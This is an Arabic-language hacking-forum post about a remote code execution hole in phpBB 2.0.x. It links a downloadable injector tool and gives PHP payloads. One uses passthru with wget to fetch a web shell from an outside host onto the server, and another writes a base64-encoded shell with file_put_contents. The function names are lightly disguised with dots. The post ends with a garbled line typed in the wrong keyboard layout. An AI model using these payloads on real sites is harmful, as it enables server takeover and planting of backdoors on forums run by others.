اسم الثغرة : Remote Code Execution
الخطوة : High
الاصدارات : phpbb = 2.0.x
الترقيع : ترقية النسخة لآخر اصدار + تعطيل دوال التنفيذ
سمعت عن طرق سابقة شبيهة ولكن الأساليب تختلف ويفضل ان الواحد يطلع ع أكبر قدر من اساليب الوصول لثغرة معينة لأن الواحد مايضمن حالة واحدة مع كل المواقع اللي تواجهه
التطبيق
http://forum.unknown-heroes.com/file...--InjEctOr.rar
هدية خاصة للعناكب..
بدائل عن ماحقن بالتطبيق :
كود PHP:
passthr.u('pwd') // كأول مرة, للتعرف ع المسار
passthr.u('wget site.com/shell.php -O /path/shell.php') // لسحب الشل ع هالمسار
طريقة ثانية :
ممكن انشاء ملف وحقن كود الشل مباشرة فيه :
كود PHP:
file_put_conten.ts('/path/shell.php',base.64_decode('encode shell here'));
والطريق كثيرة تحتاج منك فقط للتعرف ع php ودوالها
اللي يبي يتعرف ع الدوال لا يسأل هنا, يروح ع الموقع php.net ويبحث
ThE End
Bay Bay ... $ee y0u
Ftd]d,D hsjyghg rhu]m fdhkhj phpbb ,vtu ag